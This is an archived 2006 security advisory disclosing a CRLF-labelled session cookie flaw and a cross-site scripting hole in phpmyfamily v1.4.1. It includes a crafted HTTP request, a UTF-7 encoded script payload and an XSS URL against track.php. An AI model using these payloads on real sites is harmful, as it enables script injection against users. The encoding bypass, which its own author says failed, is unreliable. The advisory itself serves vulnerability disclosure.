HYSA-2006-007-phpmyfamily.txt

2006-04-01T00:00:00
ID PACKETSTORM:45064
Type packetstorm
Reporter matrix killer
Modified 2006-04-01T00:00:00

Description

                                        
                                            `------------------------------------------------------  
HYSA-2006-007 h4cky0u.org Advisory 016  
------------------------------------------------------  
Date - Mon March 27 2006  
  
  
TITLE:  
======  
  
phpmyfamily v1.4.1 CRLF injection & XSS  
  
  
SEVERITY:  
=========  
  
Medium  
  
  
SOFTWARE:  
=========  
  
phpmyfamily v1.4.1  
  
http://www.phpmyfamily.net/  
  
  
INFO:  
=====  
  
phpmyfamily is a dynamic genealogy website builder which allows geographically dispersed family members to maintain a central   
  
database of research which is readily accessable and editable.  
  
  
DESCRIPTION:  
============  
  
--== CRLF Injection ==--  
  
GET /phpmyfamily/ HTTP/1.0  
Accept: */*  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)  
Host: 127.0.0.1:80  
Cookie: PHPSESSID=-4-2-=674sdasaf_  
Connection: Close  
  
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z,   
  
0-9 and '-,' in C:\AppServ\www\phpmyfamily\inc\config.inc.php on line 88  
  
You can try to encode <script>alert('matrix_killer');</script> in Utf-7 like this:  
  
+ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer'); +ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4-   
  
This way you can bypass the protection, but I'm not sure that it will work. For me it didn't but I'm still a beginner with   
  
the crlf attacks.  
  
--== XSS ==--  
  
http://127.0.0.1/phpmyfamily/track.php?person=00001&name='><script>alert();</script>&email=1&action=sub&submit=Wy%B6lij  
  
  
VENDOR STATUS:  
==============  
  
Vendor was contacted but no response received till date.  
  
  
CREDITS:  
========  
  
This vulnerability was discovered and researched by matrix_killer of h4cky0u Security Forums.  
  
mail : matrix_k at abv.bg  
  
web : http://www.h4cky0u.org  
  
  
Co-Researcher:  
  
h4cky0u of h4cky0u Security Forums.  
  
mail : h4cky0u at gmail.com  
  
web : http://www.h4cky0u.org  
  
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!  
  
  
ORIGINAL ADVISORY:  
==================  
  
http://www.h4cky0u.org/advisories/HYSA-2006-007-phpmyfamily.txt  
`